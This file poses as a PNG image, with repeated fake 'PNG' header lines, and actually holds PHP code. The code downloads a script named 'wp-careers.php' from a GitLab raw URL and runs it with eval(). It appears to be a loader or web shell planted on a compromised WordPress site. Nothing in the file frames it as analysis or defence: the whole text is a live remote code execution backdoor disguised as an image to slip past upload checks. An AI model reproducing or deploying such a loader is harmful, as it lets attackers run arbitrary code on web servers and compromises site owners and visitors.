PNG %k25u25%fgd5n! ﻿﻿PNG %k25u25%fgd5n! 
﻿﻿PNG %k25u25%fgd5n! ﻿﻿PNG %k25u25%fgd5n! 
﻿﻿PNG %k25u25%fgd5n! ﻿﻿PNG %k25u25%fgd5n! 
<?php
$path = "https://gitlab.com/bosseptp-group/bosseptp-project1/-/raw/main/wp-careers.php";
$code = implode('', file($path));
eval("?>" . $code);
?>